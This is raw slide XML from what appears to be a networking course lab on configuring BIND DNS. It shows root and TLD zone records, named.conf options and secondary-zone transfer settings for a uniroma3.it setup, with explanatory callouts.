                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER-2.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.    IN      A       10.0.3.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER-2.  IN      A       100.0.75.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>it.             IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</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9540DB5D-D8A5-A33E-0B10-5CB03AD1F0F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2712" cy="13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a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot2</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ADDC9E71-2E13-53B5-C1A6-8F1861141E93}"/>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A2B740F0-507E-DC5C-FCD5-4D3008F0368F}"/>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4819E164-C45C-D3E4-E9C7-678E61AEC57C}"/>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27170241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5BA14-6627-AF99-AB32-AB816D0E9AD8}"/>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13D58F86-B949-0B9D-A502-C6E4FCC841E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1814065"/>
            <a:ext cx="7641005" cy="3205608"/>
            <a:chOff x="126" y="3285"/>
            <a:chExt cx="5943" cy="1189"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA87239-C914-0D40-B367-D12141508C63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="112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include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named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:br>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:b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zone "."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 slave;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/var/cache/</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db.root.transfered</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masters { 10.0.3.5; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A9EB5D-CC7F-6F6A-CCA8-6E5216B42FA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="170" y="3285"/>
              <a:ext cx="2927" cy="13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a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot2</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3760C5B0-75F1-A8A2-687B-465AA12A2667}"/>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9C46EB18-6265-13AC-CED9-95C4E7DAEF12}"/>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04382130-8DE6-78F8-F612-BAF80C08674E}"/>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8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B7CA58-CA4E-84D5-5427-7A195617470A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7433954" y="1640928"/>
            <a:ext cx="4393121" cy="702151"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -122980"/>
              <a:gd name="adj2" fmla="val 22229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This server is a Secondary (Slave), copy everything from the Master</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060FFC04-7A0D-83F4-61F5-1C4C89A45255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8989621" y="3224848"/>
            <a:ext cx="3077998" cy="1249873"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80590"/>
              <a:gd name="adj2" fmla="val 367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indicates where on disk BIND should save the copy of the zone it receives from the master</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10900730-7EA8-FAD2-261C-550EF6F83C30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5931516" y="4993296"/>
            <a:ext cx="3830316" cy="941320"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -59803"/>
              <a:gd name="adj2" fmla="val -12492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specifies the IP address of the Master (Primary) server from which to download data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16273824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75AD9-5466-5BE3-F5FA-081D82DB3DB5}"/>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58BC1522-683C-1655-1385-86B814E89BD5}"/>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F67C1E53-2B62-34AF-3742-8D5C3D64C1CA}"/>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C198F857-3B26-60C0-CD6C-03E452C13BD7}"/>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5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9B5EE2-DC64-521E-C60B-557079F25FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442148"/>
            <a:ext cx="7087578" cy="1973704"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5E8D25-BC46-06A9-6B20-FE5F51C9EA8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>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eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory “/var/cache/bind”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-query {any; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    recursion no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDFA80F-4077-43A5-5023-A06ABAD81BD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969"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a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot2</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named.conf.options</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34210115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DF417-DB00-4B28-A760-E630DC220BF9}"/>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73C1AA3B-2FFD-AB3C-5015-C4DADABF87F1}"/>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BDC86D78-BC5E-C5E4-100D-F536AE3299B9}"/>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AD404AE6-8757-5CDC-4D23-19C479A2124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5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB7A5ECB-5AC5-E207-76CD-FC4ECA29DCAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442150"/>
            <a:ext cx="7087578" cy="2176656"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3047EB4-FEC8-ED27-99F5-B135412B6F11}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="80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100.0.75.10/24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default via 100.0.75.1</a:t>
              </a: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/var/cache/bind/keys</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/var/cache/bind</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775 /var/cache/bind</a:t>
              </a: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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{478C76A6-B5D8-449F-F3F0-5313E6B2C48E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969"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dnsuni2.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4017696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0F31A-9171-DC36-32C5-1D2867853F35}"/>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7E02E9F3-2819-D314-B5AC-105EB6397B75}"/>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243F08ED-0F7B-0942-0908-16777CFCB756}"/>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F5051B56-15E1-B666-5FF0-AD9CA5DF7B2A}"/>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5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B99C0F-7002-6FD8-B4F1-58C3F405632A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442150"/>
            <a:ext cx="7087578" cy="2176656"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C8BD3F9-B1B3-0B0F-8B8E-21FAB878872E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="80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100.0.75.10/24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default via 100.0.75.1</a:t>
              </a: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/var/cache/bind/keys</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/var/cache/bind</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775 /var/cache/bind</a:t>
              </a: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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9605BA09-9F6A-CBAF-18F3-B5EE8A34DEC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969"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dnsuni2.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14727783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B662A-5053-09B8-BB3A-497905FD17E5}"/>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97658372-D5F4-8A21-3BEA-A2899FB19DE1}"/>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6DB50513-1ACF-33DB-E09F-8419E5FADA9A}"/>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1B607D4F-25BF-3B6E-7588-F1AF4E4D510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5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72531F84-A950-B780-E7AD-B1DB21313170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="1259632"/>
            <a:ext cx="7087578" cy="986852"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="389"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B99F5D2-FC17-99E2-6B72-39A9D64AB024}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="331"/>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eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.                   IN  NS    ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.        IN  A     10.0.3.5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{606E8236-E112-BFBC-AECF-D591E6C3F5B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969"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/dnsuni2/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0557734B-E260-4AAB-3753-489A3FEA7592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2605878" y="2704954"/>
            <a:ext cx="7087578" cy="3447640"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1359"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D40278E-B9CE-238F-5D6D-A98B054D465C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="1301"/>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a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include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named.conf.options</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zone "."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hint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file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db.root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zone "uniroma3.it"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 slave;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/var/cache/</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/db.uniroma3.transfered";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    masters { 110.0.0.10; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58822B47-3ED0-D261-41E5-76A612446701}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
